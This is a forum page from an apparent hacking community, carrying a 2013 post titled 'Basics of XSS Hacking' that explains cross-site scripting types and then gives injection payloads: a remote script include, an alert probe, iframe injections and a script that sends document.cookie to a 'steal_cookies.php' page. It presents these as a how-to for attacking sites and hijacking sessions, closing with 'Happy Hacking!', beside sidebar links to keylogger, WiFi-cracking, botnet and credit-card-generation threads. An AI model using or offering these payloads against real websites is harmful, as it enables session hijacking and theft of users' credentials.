Ethical Experts
Ethical Experts

A Community Dedicated to Helping and Learning . Here You Will Get Hacking Tutorials and Monetizing Methods . We Hope You Have a Pleasant Stay
 
HomeHome  SearchSearch  FAQFAQ  RegisterRegister  Log in  
Still Currently working on the forum design, until I find a perfect design that can sit there for the whole life :p .. Please Bare with us if you see the design change while / after you refresh a page or return ! Sorry for the Inconvenience ~!
Search
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Hack Pack : Largest Hacking Tools Collection
Tue Apr 28, 2015 9:35 am by THE-OUTSIDER

» Hi everyone!
Fri Nov 07, 2014 11:24 pm by zekrum

» Hacking Email ID's
Thu Sep 25, 2014 7:22 pm by NAVEEN KUMAR . S

» entering in a computer binary
Sat Sep 20, 2014 1:29 pm by erosh23

» hi hackers
Sat Sep 20, 2014 1:26 pm by erosh23

» Introduce Yourself !
Sat Sep 20, 2014 1:23 pm by erosh23

» Hello guys
Wed Jul 30, 2014 10:52 pm by RZero67

» need botnet like zues Betabot or any good botnet files please admin help me
Fri Jul 25, 2014 9:44 pm by sire_roktiv

» Extension Spoofer v0.1 [Beta Release]
Fri Jul 11, 2014 9:33 am by The Joker

Most Viewed Topics
Hack Pack : Largest Hacking Tools Collection
HACK WIFI PASSWORD USING CMD WHEN YOU ARE CONNECTED WITH WIFI
Hack Your BroadBand !! RISK FREE !!
How to Hack the Windows Admin Password Using OphCrack in Backtrack tutorial
Hacking With Keyloggers Prorat
How to Get Unlimited time in an Internet Cafe ... :D
Cracking a WPA/WPA-2 Password.. ;)
How to Hack Websites & Servers - Tutorial
Backtrack and Facebook
Credit Card Generating Sequence
Keywords
netcat
Facebook Like
Similar topics

Share | 
 

 Basics of XSS Hacking

View previous topic View next topic Go down 
AuthorMessage
thedhruvsoni
Team IHA Admins
Team IHA Admins
avatar

Posts : 11
Join date : 2013-10-12

PostSubject: Basics of XSS Hacking   Mon Oct 21, 2013 1:32 am

Basics of XSS Hacking
Cross-site scripting (Popularly known as XSS) and SQL injection errors are two prominent vulnerabilities that have been responsible for a large number of security breaches in recent years. XSS is a huge problem in current scenario as most of the web developers are even not aware of this kind of attack. The basic differences between SQL Injection & XSS are:

SQL Injection is the injection of SQL Statements whereas XSS is the Injection of Codes (It can be Javascript, PHP code, VB Code or even regular HTML Codes.
SQL Injection is injecting a SQL statement into the query execution function in the server side script. But, XSS can be both Client & Server Side. (Stored or persistent XSS is Server Side whereas Non-persistent is Client Side as an attacker needs to insert code each time.)

Together XSS and SQL Injection is the most deadly combination that can be found today and more than 90% of the sites are vulnerable to any one of the following. In SQL injection, the user can add additional conditions or commands to a database query, thus allowing the user to bypass authentication or alter data. With XSS, an attacker can inject this own HTML (including JavaScript or other executable code) into a web page; this is exploitable in many ways, up to complete compromise of the browser. XSS is used by a phisher to inject credential stealing code into official sites without having to redirect the user to a copy of the site. This means that any security credentials will be valid on the attack site and even white-listing will not prevent the attack.

So, let’s start how this XSS Attack actually takes place.

XSS Attack can be of many types:
Non-persistent or reflected
DOM-based or Local cross-site scripting
Stored or persistent

Now have a look at an example. Let's say that we have a vulnerable page. A malicious user, Hacker, posts a "special_code" post, containing the following:

<script type="text/javascript" src="http://victimwebsite.com/xss.js"></script>

If the page is vulnerable, then everyone who visits the page, the browser will fetch the file located at http://victimwebsite.com/xss.js, and then execute the code in it.

How to find if a website is vulnerable to XSS?

To find out if any website is vulnerable to XSS, what you need to do is just insert the script into any search or input text field.

<script>alert(“hi”);</script>

If upon Submitting, the page return an alert with “hi” in it, then that particular website should be vulnerable to XSS Attack.

Now you can insert link to any third party website or fake login page in the script tag and that link gets stored with the original content. We can also insert links to javascripts, which will allow the hacker to run malicious code included in the javascript upon page reloading and basically hijack any session of users accessing that particular page. Session hijacking refers to the fact that the hacker can now login into the website without even victim’s username or password. This is done by inserting cookie stealing code in the javascript.

We can insert link to any image into the vulnerable website by giving the following script in the search or text input field which is vulnerable to XSS.

<iframe src=”url of the fake page” width=”1000” height=”1000” />

It can be anything like:

<iframe src=”http://www.hacker.com/hacked.jpg” width=”1000” height=”1000” />

One can also paste pages into the victim website:

<script>document.location.href="http://www.hackers.com/steal_cookies.php"+document.cookie; </script>

Hope, you enjoyed and learnt a lot.
Happy Hacking!
Back to top Go down
View user profile
 
Basics of XSS Hacking
View previous topic View next topic Back to top 
Page 1 of 1
 Similar topics
-
» What are the basic requirements for using Selenium IDE?

Permissions in this forum:You cannot reply to topics in this forum
Ethical Experts :: Hacking Section :: Hacking Tutorials-
Jump to: